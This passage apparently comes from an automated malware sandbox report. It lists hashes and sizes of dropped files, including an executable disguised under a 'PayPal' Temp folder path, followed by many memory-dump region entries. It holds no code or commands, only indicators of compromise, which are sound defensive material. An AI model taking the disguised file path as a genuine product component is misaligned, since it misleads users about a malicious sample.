                f7722b62b4014e0c50adfa9d60cafa1c

                SHA1

                f31c17e0453f27be85730e316840f11522ddec3e

                SHA256

                ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

                SHA512

                7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

              • C:\Users\Admin\AppData\Local\Temp\PayPal\thumb\sou\onbo.bat.exe

                Filesize

                435KB

                MD5

                f7722b62b4014e0c50adfa9d60cafa1c

                SHA1

                f31c17e0453f27be85730e316840f11522ddec3e

                SHA256

                ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

                SHA512

                7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_shjoyokq.5z1.ps1

                Filesize

                1B

                MD5

                c4ca4238a0b923820dcc509a6f75849b

                SHA1

                356a192b7913b04c54574d18c28d46e6395428ab

                SHA256

                6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                SHA512

                4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

              • memory/1680-138-0x00000237AF910000-0x00000237AF986000-memory.dmp

                Filesize

                472KB

              • memory/1680-132-0x00000237AF860000-0x00000237AF882000-memory.dmp

                Filesize

                136KB

              • memory/1680-283-0x00000237974E0000-0x00000237974F0000-memory.dmp

                Filesize

                64KB

              • memory/1680-150-0x00000237974E0000-0x00000237974F0000-memory.dmp

                Filesize

                64KB

              • memory/1680-151-0x00000237974E0000-0x00000237974F0000-memory.dmp

                Filesize

                64KB

              • memory/1680-174-0x00000237B0000000-0x00000237B01DE000-memory.dmp

                Filesize

                1.9MB

              • memory/1680-252-0x00000237974E0000-0x00000237974F0000-memory.dmp

                Filesize

                64KB

              • memory/1680-250-0x00000237974E0000-0x00000237974F0000-memory.dmp

                Filesize

                64KB

              • memory/1680-187-0x00000237974E0000-0x00000237974F0000-memory.dmp

                Filesize

                64KB

              • memory/1680-182-0x00000237AF9B0000-0x00000237AFA42000-memory.dmp

                Filesize

                584KB

              • memory/1680-169-0x00000237AFC70000-0x00000237B0002000-memory.dmp

                Filesize

                3.6MB

              • memory/3680-2690-0x0000000005CD0000-0x0000000005D62000-memory.dmp

                Filesize

                584KB

              • memory/3680-2692-0x0000000006270000-0x000000000676E000-memory.dmp

                Filesize

                5.0MB

              • memory/3680-2655-0x0000000000400000-0x0000000000446000-memory.dmp

                Filesize

                280KB

              • memory/3680-2656-0x00000000052E0000-0x00000000058E6000-memory.dmp

                Filesize

                6.0MB

              • memory/3680-2657-0x0000000004D70000-0x0000000004D82000-memory.dmp

                Filesize

                72KB

              • memory/3680-2658-0x0000000004EA0000-0x0000000004FAA000-memory.dmp

                Filesize

                1.0MB

              • memory/3680-2659-0x0000000004DD0000-0x0000000004E0E000-memory.dmp

                Filesize

                248KB

              • memory/3680-2699-0x0000000006140000-0x000000000615E000-memory.dmp

                Filesize

                120KB

              • memory/3680-2698-0x0000000006E70000-0x000000000739C000-memory.dmp

                Filesize

                5.2MB

              • memory/3680-2662-0x00000000050D0000-0x00000000050E0000-memory.dmp

                Filesize

                64KB

              • memory/3680-2697-0x0000000006770000-0x0000000006932000-memory.dmp

                Filesize

                1.8MB

              • memory/3680-2696-0x00000000050D0000-0x00000000050E0000-memory.dmp

                Filesize

                64KB

              • memory/4320-140-0x0000000004490000-0x00000000044A0000-memory.dmp

                Filesize

                64KB

              • memory/4320-136-0x00000000075D0000-0x0000000007636000-memory.dmp

                Filesize

                408KB

              • memory/4320-156-0x0000000007680000-0x000000000769C000-memory.dmp

                Filesize

                112KB

              • memory/4320-160-0x0000000007F00000-0x0000000007F76000-memory.dmp

                Filesize

                472KB

              • memory/4320-141-0x0000000007890000-0x0000000007BE0000-memory.dmp

                Filesize

                3.3MB

              • memory/4320-247-0x0000000004490000-0x00000000044A0000-memory.dmp

                Filesize

                64KB

              • memory/4320-139-0x0000000004490000-0x00000000044A0000-memory.dmp

                Filesize

                64KB

              • memory/4320-287-0x0000000004490000-0x00000000044A0000-memory.dmp

                Filesize

                64KB

              • memory/4320-224-0x0000000004490000-0x00000000044A0000-memory.dmp

                Filesize

                64KB

              • memory/4320-249-0x0000000004490000-0x00000000044A0000-memory.dmp

                Filesize

                64KB

              • memory/4320-134-0x0000000007560000-0x00000000075C6000-memory.dmp

                Filesize

                408KB

              • memory/4320-198-0x0000000009310000-0x0000000009458000-memory.dmp

                Filesize

                1.3MB

              • memory/4320-133-0x0000000006D70000-0x0000000006D92000-memory.dmp

                Filesize

                136KB

              • memory/4320-194-0x0000000009040000-0x000000000930A000-memory.dmp

                Filesize

                2.8MB

              • memory/4320-157-0x0000000007C80000-0x0000000007CCB000-memory.dmp

                Filesize

                300KB

              • memory/4320-188-0x0000000008C60000-0x0000000008C7A000-memory.dmp

                Filesize

                104KB

              • memory/4320-186-0x00000000096C0000-0x0000000009D38000-memory.dmp

                Filesize

                6.5MB

              • memory/4320-126-0x0000000006E40000-0x0000000007468000-memory.dmp

                Filesize

                6.2MB

              • memory/4320-125-0x0000000004430000-0x0000000004466000-memory.dmp

                Filesize

                216KB

              • memory/4376-312-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-316-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-319-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-318-0x000001BC1D070000-0x000001BC1D080000-memory.dmp

                Filesize

                64KB

              • memory/4376-321-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-323-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-325-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-327-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-329-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-331-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-333-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-335-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-337-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-339-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-341-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-343-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-345-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-347-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-353-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-350-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-355-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-357-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-359-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-361-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-363-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-365-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-367-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-369-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-2274-0x000001BC1D070000-0x000001BC1D080000-memory.dmp

                Filesize

                64KB

              • memory/4376-2640-0x000001BC045D0000-0x000001BC04642000-memory.dmp

                Filesize

                456KB

              • memory/4376-2641-0x000001BC04640000-0x000001BC046B0000-memory.dmp

                Filesize

                448KB

              • memory/4376-2642-0x000001BC1D070000-0x000001BC1D080000-memory.dmp

                Filesize

                64KB

              • memory/4376-2643-0x000001BC1D070000-0x000001BC1D080000-memory.dmp

                Filesize

                64KB

              • memory/4376-2644-0x000001BC02DC0000-0x000001BC02E0C000-memory.dmp

                Filesize

                304KB

              • memory/4376-2645-0x000001BC046D0000-0x000001BC046F0000-memory.dmp

                Filesize

                128KB

              • memory/4376-2646-0x000001BC1D070000-0x000001BC1D080000-memory.dmp

                Filesize

                64KB

              • memory/4376-308-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-314-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-310-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-306-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-305-0x000001BC1CF20000-0x000001BC1D019000-memory.dmp

                Filesize

                996KB

              • memory/4376-304-0x000001BC1CF20000-0x000001BC1D01C000-memory.dmp

                Filesize

                1008KB

              • memory/4376-300-0x0000000140000000-0x00000001400B2000-memory.dmp

                Filesize

                712KB

              • memory/4376-2681-0x000001BC1D500000-0x000001BC1D57A000-memory.dmp

                Filesize

                488KB

              • memory/4628-285-0x0000018360430000-0x0000018360440000-memory.dmp

                Filesize

                64KB

              • memory/4628-284-0x0000018360430000-0x0000018360440000-memory.dmp

                Filesize

                64KB

              • memory/4628-199-0x0000018360430000-0x0000018360440000-memory.dmp

                Filesize

                64KB

              • memory/4628-201-0x0000018360430000-0x0000018360440000-memory.dmp

                Filesize

                64KB

              • memory/4924-290-0x00000000072D0000-0x00000000072E0000-memory.dmp

                Filesize

                64KB

              • memory/4924-239-0x00000000072D0000-0x00000000072E0000-memory.dmp

                Filesize

                64KB

              • memory/4924-237-0x00000000072D0000-0x00000000072E0000-memory.dmp

                Filesize

                64KB